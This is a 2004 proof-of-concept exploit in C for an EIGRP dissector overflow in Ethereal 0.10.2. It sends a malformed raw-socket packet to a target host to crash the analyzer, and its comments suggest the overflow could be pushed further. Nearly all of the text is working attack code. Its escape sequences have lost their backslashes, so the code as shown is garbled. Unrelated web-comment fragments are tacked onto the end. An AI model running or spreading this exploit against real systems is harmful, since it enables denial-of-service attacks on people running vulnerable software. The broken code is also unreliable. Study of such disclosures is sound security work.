/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont < ethereal at simphalampin dot com >
* www simphalempin com dev
*
* This vulnerability was found by:
* Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
* security e-matters de advisories 032004.html
*
* Vulnerable:
* - Ethereal v0.10.2
*
* Not vulnerable:
* - Ethreal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven't tried.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
static const char packet[] =
"x01" /* Version */
"x04" /* Opcode: Reply */
"x00x00" /* Checksum (invalid) */
"x00x00x00x00" /* Flags */
"x00x00x00x00" /* Sequence number */
"x00x00x00x00" /* ACK */
"x00x00x00x00" /* AS number */
/* IP internal routes TLV */
"x01x02" /* Type */
"x00x39" /* Length (should be 0x1C) */
"x00x00x00x00" /* Next hop */
"x00x00x00x00" /* Delay */
"x00x00x00x00" /* Bandwitdh */
"x00x00x00" /* MTU */
"x00" /* Hop count: directly connected */
"xff" /* Reliability: maximum */
"x01" /* Load: minimum */
"x00x00" /* Reserved */
"xff" /* Prefix length: should be > 0 and <= 32 */
"x00x00x00" /* Destination network */
"xffxffxffxff" "xffxffxffxff"
"xffxffxffxff" "xffxffxffxff"
"xffxffxffxff" "xffxffxffxff"
"xffxffxffxff" "xff" /* buffer overflow */
;
static int
proof (const struct sockaddr_in *dest)
{
int fd;
size_t len;
fd = socket (PF_INET, SOCK_RAW, 88);
if (fd == -1)
{
perror ("Raw socket error");
return 1;
}
len = sizeof (packet) - 1;
if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
sizeof (struct sockaddr_in)) != len)
{
perror ("Packet sending error");
close (fd);
return 1;
}
puts ("Packet sent!");
close (fd);
return 0;
}
static int
usage (const char *path)
{
fprintf (stderr, "Usage: %s <hostname/IP>n", path);
return 2;
}
int
main (int argc, char *argv[])
{
struct sockaddr *dest;
puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
"proof of concept coden"
"Copyright (C) 2004 R<E9>mi Denis-Courmont "
"<x65x74x68x65x72x65x61x6cx40x73x69x6dx70"
"x68x61x6cx65x6dx70x69x6ex2ex63x6fx6d>n");
if (argc != 2)
return usage (argv[0]);
else
{
struct addrinfo help, *res;
int check;
memset (&help, 0, sizeof (help));
help.ai_family = PF_INET;
check = getaddrinfo (argv[1], NULL, &help, &res);
if (check)
{
fprintf (stderr, "%s: %sn", argv[1],
gai_strerror (check));
return 1;
}
dest = res->ai_addr;
}
return proof ((const struct sockaddr_in *)dest);
}
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666